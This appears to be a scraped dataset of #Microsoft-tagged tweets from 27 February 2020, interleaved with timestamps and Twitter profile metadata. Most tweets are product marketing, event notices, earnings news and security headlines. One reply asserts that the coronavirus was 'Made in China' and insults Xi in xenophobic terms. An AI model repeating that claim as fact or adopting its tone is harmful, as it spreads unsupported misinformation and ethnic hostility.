    <t>{'id': 956098357071663104, 'id_str': '956098357071663104', 'name': 'Actis Business Partners', 'screen_name': 'Actis_NL', 'location': 'Schiphol-Rijk, Haarlemmermeer', 'description': 'Distributeur AudioCodes | Services | Trainingen AudioCodes &amp; CC4Skype | Workshops |', 'url': 'https://t.co/Za8OMSGC2f', 'entities': {'url': {'urls': [{'url': 'https://t.co/Za8OMSGC2f', 'expanded_url': 'https://www.actis.nl', 'display_url': 'actis.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Wed Jan 24 09:36:26 +0000 2018', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 212,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'http://pbs.twimg.com/profile_images/956107911452872704/PczsFfoP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/956107911452872704/PczsFfoP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/956098357071663104/1516788887',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</si>
  <si>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15:35:01 +0000 2020</t>
  </si>
  <si>
    <t>You can use the AKS engine cli tool to deploy and manage a Kubernetes cluster on Azure Stack Hub. https://t.co/JWSCiQK1pc #microsoft #azurestackhub #kubernetes</t>
  </si>
  <si>
    <t>Thu Feb 27 15:34:34 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Cisco Working on Patches for New Kr00k WiFi Vulnerability:" https://t.co/k0QAthoAz0
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 15:34:04 +0000 2020</t>
  </si>
  <si>
    <t>We are facing real significant workforce challenges where we cant fill the jobs we need to be filled...policy makers want to be a part of that. Aric Newhouse SVP, Policy and Government Relations @ShopFloorNAM #EnvisionMFG #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 15:31:43 +0000 2020</t>
  </si>
  <si>
    <t>Could we let a (pretty stupid) virus stop us? Naaay! ADworld Experience will be, as announced, on April 23-24, 2020 in Bologna (Italy) or via Live streaming https://t.co/l5Pq6op1bt #GoogleAds #FacebookAds #Amazon #Microsoft #ppc</t>
  </si>
  <si>
    <t>Thu Feb 27 15:31:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is notifying admins of a series of disruptive changes to authentication in Office 365 email services @theregister
https://t.co/zTQtbgPquC https://t.co/wLxu8GuPrH</t>
  </si>
  <si>
    <t>{'id': 50346974, 'id_str': '50346974', 'name': 'Mobliciti', 'screen_name': 'mobliciti', 'location': 'United Kingdom', 'description': 'We deliver IT Mobility &amp; Cloud Access Security using innovative technologies delivered through our range of end-to-end IT solutions', 'url': 'https://t.co/Mwjlcr1X0g', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mwjlcr1X0g', 'expanded_url': 'http://www.mobliciti.com', 'display_url': 'mobliciti.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 447, 'friends_count': 429, 'listed_count': 22, 'created_at': 'Wed Jun 24 16:07:54 +0000 2009', 'favourites_count': 550, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4149, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCFCFC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/890133404968267777/fYMzxzg-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/890133404968267777/fYMzxzg-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50346974/1540476593', 'profile_link_color': '94CA4C', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '406F81', 'profile_text_color': '93CC6B', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:31:33 +0000 2020</t>
  </si>
  <si>
    <t>OH: "Github is down. I guess they've finished migrating to Azure."
I guess this will become the default joke from now on. #microsoft is such a strong #brand</t>
  </si>
  <si>
    <t>{'id': 16967452, 'id_str': '16967452', 'name': 'Andrei Neculau', 'screen_name': 'andreineculau', 'location': 'Stockholm, Sweden', 'description': '(temporarily) an API dissident and a Erlang/JS janitor. _i_ value, cherish, criticize, plan, enjoy, think. on my own, for my own.', 'url': 'http://t.co/IGsokNUOg3', 'entities': {'url': {'urls': [{'url': 'http://t.co/IGsokNUOg3', 'expanded_url': 'http://andreineculau.com', 'display_url': 'andreineculau.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 330, 'friends_count': 219, 'listed_count': 45, 'created_at': 'Sat Oct 25 15:12:41 +0000 2008', 'favourites_count': 1303, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6534,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'http://pbs.twimg.com/profile_images/1216380813/IMG_79215_square_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216380813/IMG_79215_square_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16967452/1437328331', 'profile_link_color': '000000', 'profile_sidebar_border_color': '4F606E', 'profile_sidebar_fill_color': '6E717A', 'profile_text_color': '032742', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:31:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is urging admins to disable the #SMBv1 protocol. Secrutiny Board Member, Shane Shook, agrees: "There's no reason to have SMBv1 on Exchange, unless they are running other apps or file services from that server, which is a bad security practice. https://t.co/JqEzyA1g4s https://t.co/wAGTNXoRkg</t>
  </si>
  <si>
    <t>Thu Feb 27 15:31:18 +0000 2020</t>
  </si>
  <si>
    <t>Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact Bleek Technologies for help driving your company's digital transformation. https://t.co/97Y2GovuQ0</t>
  </si>
  <si>
    <t>{'id': 322745133, 'id_str': '322745133', 'name': 'BLEEK TECHNOLOGIES', 'screen_name': 'BleekTech', 'location': 'TEXAS', 'description': 'Small Biz - IT Consulting, CLOUD SERVICES, Just a Techie... 832.338.0122', 'url': 'http://t.co/XJpQscDaQu', 'entities': {'url': {'urls': [{'url': 'http://t.co/XJpQscDaQu', 'expanded_url': 'http://www.bleektech.com', 'display_url': 'bleektech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 168, 'friends_count': 664, 'listed_count': 11, 'created_at': 'Thu Jun 23 17:37:12 +0000 2011', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1399,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'http://pbs.twimg.com/profile_images/1760379068/GDTBtwit2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1760379068/GDTBtwit2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/322745133/1524849531', 'profile_link_color': '4A913C',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</si>
  <si>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15:30:33 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Business? Business Premium? E3 or E5? Which #Office365 package is right for my law firm? @bschorr #microsoft  https://t.co/OEaUYBTTwC https://t.co/bkDxR3H0w1</t>
  </si>
  <si>
    <t>Thu Feb 27 15:30:30 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Cisco Working on Patches for New Kr00k WiFi Vulnerabilities:" https://t.co/CvidZ52ZIj
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 15:30:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Connected Vehicle Platform: trends and investment areas https://t.co/CHAh9usmbU #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 15:30:08 +0000 2020</t>
  </si>
  <si>
    <t>Join us in 1.5 hours to learn What Teams Live Events are, how to administer Teams Live Events, how to schedule Teams Live Events, and how to deliver/produce Teams Live Events #office365 #microsoft #microsoftteams #microsoftstream #microsoft365 https://t.co/xA7046FVuq</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</si>
  <si>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33089, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 62432,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</si>
  <si>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Feb 27 15:30:03 +0000 2020</t>
  </si>
  <si>
    <t>We all deserve the cleanest air possible. Read how #AI could help plan the healthiest route through your city. #Microsoft #smartcity #Microsoft #AIforEarth https://t.co/993EA8sl2m</t>
  </si>
  <si>
    <t>Thu Feb 27 15:29:51 +0000 2020</t>
  </si>
  <si>
    <t>Hackers Scanning for Vulnerable Microsoft Exchange Servers, Patch Now! #CyberSecurity #Microsoft #ExchangeServers https://t.co/Suu4pOkAOz</t>
  </si>
  <si>
    <t>{'id': 1410394555, 'id_str': '1410394555', 'name': 'Messageware', 'screen_name': 'MessagewareInc', 'location': '', 'description': 'A trusted Microsoft Gold Certified Partner and ISV for over 15 years, Messageware develops solutions that secure and enhance Microsoft Exchange Outlook Web App.', 'url': 'http://t.co/fMxKD1V9YF', 'entities': {'url': {'urls': [{'url': 'http://t.co/fMxKD1V9YF', 'expanded_url': 'http://www.messageware.com/', 'display_url': 'messageware.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 120, 'friends_count': 81, 'listed_count': 17, 'created_at': 'Tue May 07 14:30:07 +0000 2013', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 618, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '333333', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/476072783105896448/dxJwRoA__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/476072783105896448/dxJwRoA__normal.png', 'profile_link_color': '2B6CAD',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</si>
  <si>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Feb 27 15:29:05 +0000 2020</t>
  </si>
  <si>
    <t>Statement of Works https://t.co/cGiGOV5sMV
#Microsoft #Free #Procurement #Consulting #Easy #Register #Startups #Online #Modeloe #docs #Document #Template #Smallbusiness #Picture #Design #value #UK #FTSE #Dow</t>
  </si>
  <si>
    <t>Thu Feb 27 15:28:39 +0000 2020</t>
  </si>
  <si>
    <t>Trots op onze Microsoft Security Gold Status!  #Microsoft #Azure #Security 
https://t.co/s9MyGAkXW7</t>
  </si>
  <si>
    <t>{'id': 56338386, 'id_str': '56338386', 'name': 'Macaw Nederland', 'screen_name': 'MacawNL', 'location': 'Hoofddorp', 'description': '#Macawnl | Volg ons &amp; blijf up-to-date | Digital Transformation, Customer Experience, Employee Empowerment, IT en Jobs | Microsoft &amp; Sitecore #ChallengeAccepted', 'url': 'http://t.co/rDrvaYyP1D', 'entities': {'url': {'urls': [{'url': 'http://t.co/rDrvaYyP1D', 'expanded_url': 'http://www.macaw.nl', 'display_url': 'macaw.nl', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1155, 'friends_count': 472, 'listed_count': 179, 'created_at': 'Mon Jul 13 10:19:02 +0000 2009', 'favourites_count': 1710, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4943, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCEC3C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1118413392929333248/wL1Qzs3o_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118413392929333248/wL1Qzs3o_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56338386/1555485864', 'profile_link_color': 'FBD200', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E9E7EC', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:27:28 +0000 2020</t>
  </si>
  <si>
    <t>Our very first #postgres meetup at #microsoft ! 1h to kick off https://t.co/SuTo666N6X</t>
  </si>
  <si>
    <t>{'id': 705007528577536000, 'id_str': '705007528577536000', 'name': 'Alicja Kucharczyk', 'screen_name': 'StiepanTrofimo', 'location': 'Warszawa, Polska', 'description': '', 'url': 'https://t.co/6HJZ3Pcf3X', 'entities': {'url': {'urls': [{'url': 'https://t.co/6HJZ3Pcf3X', 'expanded_url': 'https://www.meetup.com/pl-PL/Warsaw-PostgreSQL-Users-Group/', 'display_url': 'meetup.com/pl-PL/Warsaw-Pâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 245, 'listed_count': 3, 'created_at': 'Wed Mar 02 12:31:08 +0000 2016', 'favourites_count': 825, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 205, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1137208292332179456/XIs4ech5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1137208292332179456/XIs4ech5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/705007528577536000/1559966696',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</si>
  <si>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15:27:20 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews Coronavirus was Made in China.
The world will remember that "Sick Man from China" Xi
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/4I4Bq1ROCh</t>
  </si>
  <si>
    <t>Thu Feb 27 15:26:46 +0000 2020</t>
  </si>
  <si>
    <t>The #naked #truth, they #stand there #proud when the #topic of #erectile #dysfunction #raises it's #head.
#created on #microsoft #paint https://t.co/QLVTCgv1of</t>
  </si>
  <si>
    <t>Thu Feb 27 15:25:22 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/zysjflShF4
.
.
.
.
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | @MSDYN365BC @Microsoft https://t.co/MZAgf0jpdw</t>
  </si>
  <si>
    <t>Thu Feb 27 15:25:01 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the preview of Azure Shared Disks for clustered applications
https://t.co/YaR2SVYcTP
#Microsoft #azure #app #technology #cloud #iot #data
#issquared #cloudsecurity #data https://t.co/6sOvXyzVcE</t>
  </si>
  <si>
    <t>Thu Feb 27 15:22:02 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 15:20:29 +0000 2020</t>
  </si>
  <si>
    <t>How one man could have flooded your phone with Microsoft spam
via Naked Security | SOPHOS | #DFIR #Microsoft
https://t.co/DEMcKwhYOe</t>
  </si>
  <si>
    <t>{'id': 1077428504780783617, 'id_str': '1077428504780783617', 'name': 'DFIR News', 'screen_name': 'DFIRNews', 'location': 'New York, USA', 'description': 'The Latest in Digital Forensics and Incident Response #DFIR #Forensics #IR #4n6', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 416, 'friends_count': 126, 'listed_count': 7, 'created_at': 'Tue Dec 25 04:59:07 +0000 2018', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6687,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'http://pbs.twimg.com/profile_images/1081394890741829633/LNN2Wq4h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081394890741829633/LNN2Wq4h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1077428504780783617/1546889539', 'profile_link_color': 'FF0000',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</si>
  <si>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15:20:04 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 15:19:03 +0000 2020</t>
  </si>
  <si>
    <t>Make sure to bookmark!
With all the #Microsoft events happening in 2020, it becomes challenging keeping up to date when all those events are happening... 
2020 Microsoft Conference Calendar: For Partners, IT Pros and Developers https://t.co/GsuYb3xyL5
#IAMCP #MSPartner https://t.co/mvMVlGSHgR</t>
  </si>
  <si>
    <t>Thu Feb 27 15:18:38 +0000 2020</t>
  </si>
  <si>
    <t>Video of Microsoft Surface Duos Peek feature shows how the dual-screen handset will work - TechRadar India https://t.co/thqsPvpaft via @GoogleNews #microsoft #surface #surfaceduo #peak</t>
  </si>
  <si>
    <t>{'id': 21061962, 'id_str': '21061962', 'name': 'Chris Fischer', 'screen_name': 'simplifyyourit', 'location': '', 'description': 'IT Consultant and solution provider for 13+ years. Linux and Windows based IT solutions.\r\nInterests: Technology, small business marketing, &amp; helping others.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 120, 'listed_count': 2, 'created_at': 'Tue Feb 17 03:56:01 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 137,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'http://pbs.twimg.com/profile_images/1765000816/fbookprofile2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1765000816/fbookprofile2_normal.jpg',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</si>
  <si>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15:17:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has released at update on their Q3FY20 guidance.  They do not expect to meet the "More Personal Computing segment" targets. #Xbox is not called out specifically. They also reiterate top priority on health and safety of employees due to COVID-19. https://t.co/7Lf1JtOr6U</t>
  </si>
  <si>
    <t>Thu Feb 27 15:15:24 +0000 2020</t>
  </si>
  <si>
    <t>What is the difference between @Acumatica and #Microsoft Dynamics SL? Discover the difference here. https://t.co/pB2oaIQ5uw</t>
  </si>
  <si>
    <t>Thu Feb 27 15:13:04 +0000 2020</t>
  </si>
  <si>
    <t>We had a great time at our Cyber Security Breakfast yesterday!Thank you to all who joined our workshop on how to improve your security #incidentresponse with #Microsoft Azure Sentinel, building your next-gen security ops with cloud &amp;amp; AI. Further info here: https://t.co/C7OKGAj2Sj https://t.co/8tJ5PYvpJs</t>
  </si>
  <si>
    <t>{'id': 103712412, 'id_str': '103712412', 'name': 'ITC Secure', 'screen_name': 'ITC_secure', 'location': 'Canary Wharf, London', 'description': '"Making the digital world a safer place to do business." ITC provides cyber threat advisory and managed security services to midsize and enterprise clients.', 'url': 'http://t.co/xL8GQoawnj', 'entities': {'url': {'urls': [{'url': 'http://t.co/xL8GQoawnj', 'expanded_url': 'http://www.itcsecure.com', 'display_url': 'itcsecure.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1254, 'friends_count': 861, 'listed_count': 98, 'created_at': 'Mon Jan 11 00:56:08 +0000 2010', 'favourites_count': 452, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3968, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6C99C4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1032577488592031744/S4fBc-A7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032577488592031744/S4fBc-A7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/103712412/1579515364',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</si>
  <si>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Feb 27 15:11:23 +0000 2020</t>
  </si>
  <si>
    <t>Unique #microsoft slang that I'm learning right now:
 - "All Up"
 - We have to hit the right altitude
 - There's a SME for that
 - That's a greenfield opportunity
 - You're in an open office neighborhood</t>
  </si>
  <si>
    <t>{'id': 763877, 'id_str': '763877', 'name': 'Wendy "witty saying here" B', 'screen_name': 'wboswell', 'location': 'Redmond, Washington', 'description': 'Microsoft developer relations/content. Family + doggos=happy. #womenintech', 'url': 'https://t.co/MGNmhw55ZX', 'entities': {'url': {'urls': [{'url': 'https://t.co/MGNmhw55ZX', 'expanded_url': 'https://wboswellmedia.com/', 'display_url': 'wboswellmedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3552, 'friends_count': 1752, 'listed_count': 169, 'created_at': 'Sun Feb 11 02:20:41 +0000 2007', 'favourites_count': 2519, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14745, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E6DFCD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1128400695109885952/A1h9Nlae_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1128400695109885952/A1h9Nlae_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/763877/1467654376', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': '735D71', 'profile_sidebar_fill_color': '7C8695', 'profile_text_color': '9BB1A8', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:10:29 +0000 2020</t>
  </si>
  <si>
    <t>Shares of #Microsoft $MSFT are down over 2% after it warned that the #coronavirus outbreak would hurt its fiscal third quarter PC segment, cutting its sales guidance from its previous view of between $10.75 billion and $11.15 billion. https://t.co/CyJi7IwzWh</t>
  </si>
  <si>
    <t>{'id': 808700037190520833, 'id_str': '808700037190520833', 'name': 'Global Capital Asset Management', 'screen_name': 'GCAssets', 'location': 'l London I New York I', 'description': 'Official Global Capital Asset Management Twitter account. Follow us for the latest in global investment &amp; asset management news, firm news &amp; markets', 'url': 'https://t.co/t8zrl9JdEw', 'entities': {'url': {'urls': [{'url': 'https://t.co/t8zrl9JdEw', 'expanded_url': 'http://www.gcapital.co', 'display_url': 'gcapital.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 175, 'friends_count': 79, 'listed_count': 12, 'created_at': 'Tue Dec 13 15:48:08 +0000 2016', 'favourites_count': 462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5533, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/808704306207723520/lEMrcVH2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/808704306207723520/lEMrcVH2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/808700037190520833/1579649177',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</si>
  <si>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15:08:28 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud      Want $3,500 (per year!) credit for your #nonprofit to get complete access to @Azure cloud solutions and services? Watch "Activating your organization's Azure credits," from @MSFTNonprofits, to learn how to redeem your credits. https://t.co/ntTFaAwagy</t>
  </si>
  <si>
    <t>Thu Feb 27 15:08:15 +0000 2020</t>
  </si>
  <si>
    <t>The coronavirus begins to impact US tech earnings https://t.co/v79tARHipj #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 15:07:40 +0000 2020</t>
  </si>
  <si>
    <t>Join us at #Microsoft for the 13th Annual King County School-to-Work Transition Resource Fair! TODAY from 9:00am - 3:30pm!  #AtWorkWA #EmploymentServices #CommunityInclusion #TransitionServices #AbilityNotDisability #DisabilityAdvocates #KingCounty #S2W #STW #Transition https://t.co/WJTOr7yYsg</t>
  </si>
  <si>
    <t>{'id': 190428471, 'id_str': '190428471', 'name': 'AtWork!', 'screen_name': 'AtWorkWA', 'location': 'Washington, USA', 'description': 'A nationwide leader in Supported &amp; Customized Employment. We serve people with disabilities by providing training &amp; support necessary for employment #AtWorkWA', 'url': 'https://t.co/yrzUh593XW', 'entities': {'url': {'urls': [{'url': 'https://t.co/yrzUh593XW', 'expanded_url': 'http://www.atworkwa.org', 'display_url': 'atworkwa.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 466, 'friends_count': 579, 'listed_count': 35, 'created_at': 'Mon Sep 13 22:53:46 +0000 2010', 'favourites_count': 177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '313367', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1181989910875529217/nM8wBMQo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181989910875529217/nM8wBMQo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/190428471/1575911903', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FCCD6F', 'profile_sidebar_fill_color': 'CEE056', 'profile_text_color': '313367', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:07:07 +0000 2020</t>
  </si>
  <si>
    <t>And here's part 2 of 2 of my video covering the Dynamics 365 Business Central 2020 Release Wave 1 enhancements and updates. Watch, enjoy, and any questions get in touch!! 
https://t.co/zzIeErCnlY
#Microsoft #Dynamics365 #MicrosoftPartner #Office365 #Azure  #BusinessCentral</t>
  </si>
  <si>
    <t>Thu Feb 27 15:06:57 +0000 2020</t>
  </si>
  <si>
    <t>With #AI, any sized company can leverage their data and excel at decision making. Download the 'Competing in the Digital Age' eBook to learn how.    #Microsoft #Technology #BusinessAutomation #MSDyn365 https://t.co/MWOAQXERUr</t>
  </si>
  <si>
    <t>Thu Feb 27 15:06:26 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to turn raw business data into informed business decisions with #Dynamics365, #PowerBI, and other #Microsoft solutions. Subscribe today. https://t.co/E5FqTFTeAJ</t>
  </si>
  <si>
    <t>Thu Feb 27 15:05:41 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/YqdASgqRoC</t>
  </si>
  <si>
    <t>Thu Feb 27 15:04:50 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has revealed that it is set to miss its revenue target for a key segment in the third quarter due to the coronavirus impact on its supply chain.
https://t.co/apqaHXG0qH 
#coronavirus #covid19 #microsoft #supplychain</t>
  </si>
  <si>
    <t>{'id': 1088819517264941057, 'id_str': '1088819517264941057', 'name': 'The Supply Chain Consulting Group', 'screen_name': 'sccgltd', 'location': '', 'description': 'The Supply Chain Consulting Group (SCCG) is one  of the UKâ€™s leading Supply Chain and Logistics Consultancies.', 'url': 'https://t.co/F7L61rqJtI', 'entities': {'url': {'urls': [{'url': 'https://t.co/F7L61rqJtI', 'expanded_url': 'https://www.sccgltd.com/', 'display_url': 'sccgltd.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 637, 'friends_count': 1969, 'listed_count': 5, 'created_at': 'Fri Jan 25 15:22:56 +0000 2019', 'favourites_count': 2339, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 814, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1088820567652945925/EbIK0jbs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088820567652945925/EbIK0jbs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1088819517264941057/1548430064',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</si>
  <si>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15:04:01 +0000 2020</t>
  </si>
  <si>
    <t>Extended support for Windows Server 2008 &amp;amp; 2008 R2 ended on 14th January, so it will no longer receive security updates. Discover your 3 key options below &amp;amp; avoid the risks to your business. 
#EndOfLife #Microsoft #WindowsServer #EndOfSupport
https://t.co/Ct8f3n9Svd</t>
  </si>
  <si>
